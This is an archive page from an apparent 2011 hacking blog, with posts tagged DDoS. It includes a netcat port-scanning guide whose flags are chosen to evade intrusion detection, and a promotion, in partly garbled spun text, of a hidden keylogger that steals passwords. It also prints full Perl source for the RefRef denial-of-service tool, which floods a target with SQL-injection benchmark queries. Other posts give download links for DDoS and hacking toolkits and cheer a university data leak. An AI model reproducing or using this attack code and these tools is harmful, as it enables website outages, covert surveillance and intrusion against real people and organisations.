Showing posts with label ddos. Show all posts
Showing posts with label ddos. Show all posts

Scan Open Ports/Services of Target: Netcat

Monday, September 5, 2011 // by Hacking Beast Editor // Labels: , , , , // 0 comments

Prerequisites: None 

Countermeasures: Uninstall/disable fix unnecessary services, Intrusion
Detection Systems (IDS) Log and Event Log review 

Description: The netcat application has many uses; one is the ability to
scan a target for open ports and services. Another utility, cryptcat, is
almost identical except that it operates with encryption.
Procedure: From a DOS prompt, type the following with the syntax of:
nc 



_ The –v option instructs netcat to run in verbose mode, allowing you
to see the progress of the scan.
_ The –r option instructs netcat to randomize local and remote ports in
an attempt to elude any intrusion detection systems.
_ The –w2 option instructs netcat to wait 2 seconds between each port
scanned to help elude any intrusion detection systems.
_ The –z option instructs netcat to operate in a zero-I/O (Input/Output)
mode. It is best to use the –z when scanning with netcat.
_ The 1-1024 instructs netcat to scan port 1-1024.
In this example, the target has the following ports open:
_ 80 (Web)
_ 7 (Echo)
_ 13 (daytime)
_ 21 (FTP)
_ 17 (Quote of the Day)
_ 445 (Windows Share)
_ 9 (discard)
_ 139 (Windows Share)
_ 19 (Character Generator)
_ 135 (epmap)
_ 443 (HTTPS)
_ 25 (Simple Mail Transfer Protocol [SMTP])
Note: From the results of this example the “low hanging fruit” ports are:
_ 7, 13, 17, 9, and 19 as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Hackers can use Google+ servers to make DDos attack on ANY website!

Tuesday, August 30, 2011 // by Hacking Beast Editor // Labels: , , , , , , , , , , , // 0 comments


























A new security hole has been discovered on the Google+ servers that would allow potential hackers to make DDos using Google’s Bandwidth.
Google+ has been under testing for quite sometime now and a tester at an Italian Security firm has reported that the Google+ servers can be used to make DDos requests to other websites.
The original sighting of this reports can be seen at IHTeam Security Blog by Simone Quatrini. He demonstrates how users can make use of Google’s server to act as a proxy and fetch content of any desired website. It is also noted that Google’s servers are more anonymous than other servers.
Here is the video for the news : 

To Download the DDoS Source Code  Here




The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Eltima Powered Keylogger – Track PC activity, passwords and all keystrokes

Saturday, August 27, 2011 // by Hacking Beast Editor // Labels: , , , , , , , , , // 0 comments




Eltima Powered Keylogger is a jock guarantee auditing tool for plumping and littlest companies, network administrators, haunted parents and PC owners. With numerous features at a real rivalrous soprano inform it is an excellent software to watercraft any PC process, Net pattern, keystrokes, passwords (including Windows Logon Password and saved passwords), arriving and outgoing e-mails and such many.
Eltima Powered Keylogger is based on an front Windows 2000/XP/Vista low-core driver. It runs invisibly at the lowest meat take of operative system providing extraordinary hiding functions. Only you can determine Powered Keylogger in your PC. Its folders are not even visible in a file search and it does not pretence up in registry or Add/Remove Programs and is not perceptible by a itemise of firewalls, anti-keylogger and antivirus software, it is nonvisual in Tasks or Processes Inclination. Eltima presents a unique and invulnerable formulation to unhide akeylogger – a secret-word, chosen by you, so that only you bed how to unhide and can sight the logs.
With logs viewer you can go finished a move pretense of transcribed snapshots and examine the stored records. Full-screen analyser gives you the somaesthesia as if you were represent in foremost of your PC all the abstraction.
Eltima Powered Keylogger supports Unicode and captures not only usual keystrokes, but also scheme keys and combinations, Portable applications and chat-rooms etc. Most anti-spyware utilities, firewalls, anti-keyloggers and anti-virus tools cannot find Powered Keylogger being instant in the method. From now on Powered Keylogger is fully matched with Windows Vista.
Detailed information about Eltima Powered Keylogger can be found here: http://www.mykeylogger.com/

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

DDOS tool of Anon #RefRef Source Code is Now Available !








Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available. The tool has been programed in perl, python & javascript. First it was tested on pastebin, and as expected it get success. 


Source Code Of #RefRef :





#!usr/bin/perl
#RefRef (C) Anonymous 2011
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
 
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
 
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
 
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 \n";
}
 
sub toma {
return $nave->get($_[0]);
}
 
# ¿ The End ?



This code is provided by Anonymous on the official website of the tool  HERE


The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Paki Hacking ToolKit v 1.0




MD5 TOOL 

Email Spam 
SQL Tool 
Encryption & Decrypter 
ASCII Art 
Ping Web 
Google Dorks Scanner 


Requirements

•Require .Net framwork 4.0 to run this application.

•And it will be run on All Microsoft Operating systems

•Minimum requirement Windows Xp

•Don't remove any file inside RES folder 


Download  Here 

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

University of Colombo Sri Lanka - DNS Hacked and Leaked by Anonymous

Monday, August 22, 2011 // by Hacking Beast Editor // Labels: , , , , , , , , , , , , // 0 comments

A twitter update from the Anonymous Srilanka Shows that the Anonymous hackers has attacked  on the University of Colombo and has hacked DNS and the important and private information has been leaked by them

Paste Bin Proof



















The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!